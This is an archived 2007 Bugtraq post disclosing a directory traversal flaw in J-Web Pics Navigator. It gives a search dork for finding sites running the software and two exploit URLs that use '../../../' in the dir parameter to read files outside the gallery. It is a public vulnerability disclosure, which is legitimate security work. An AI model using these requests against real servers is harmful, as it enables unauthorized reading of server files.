Pics Navigator Directory Traversal Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Pics Navigator Directory Traversal Vulnerability
From: sn0oPy.team@xxxxxxxxx
Date: 22 Feb 2007 00:01:39 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

* Pics Navigator Directory Traversal Vulnerability

* By : sn0oPy

* Risk : medium

* site :  http://www.jeunes-webmasters.com/

* Dork : "Powered by J-Web Pics Navigator v2.0" | inurl:"jwpn-photos.php" |

* exploit :

         for the v1.0 http://www.target/[gallery 
directory]/pn-menu.php?ret=Pics%20Navigator&dir=../../../
         for the v2.0 http://www.target.ma/jwpn-photos.php?dir=../../../
                    

* contact : sn0oPy@xxxxxxxxxxxxxxxxxxxxxxx

* greetz : [subzero], Avg Team(forums.avenir-geopolitique.net).

Reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2692

Prev by Date: Magic News Plus File Inclusion And Xss Vulnerabilitis
Next by Date: Re: SYMSA-2007-002: Palm OS Treo Find Feature System Password Bypass
Previous by thread: Magic News Plus File Inclusion And Xss Vulnerabilitis
Next by thread: SYMSA-2007-002-1: Palm OS Treo Find Feature System Password Bypass
Index(es):
- Date
- Thread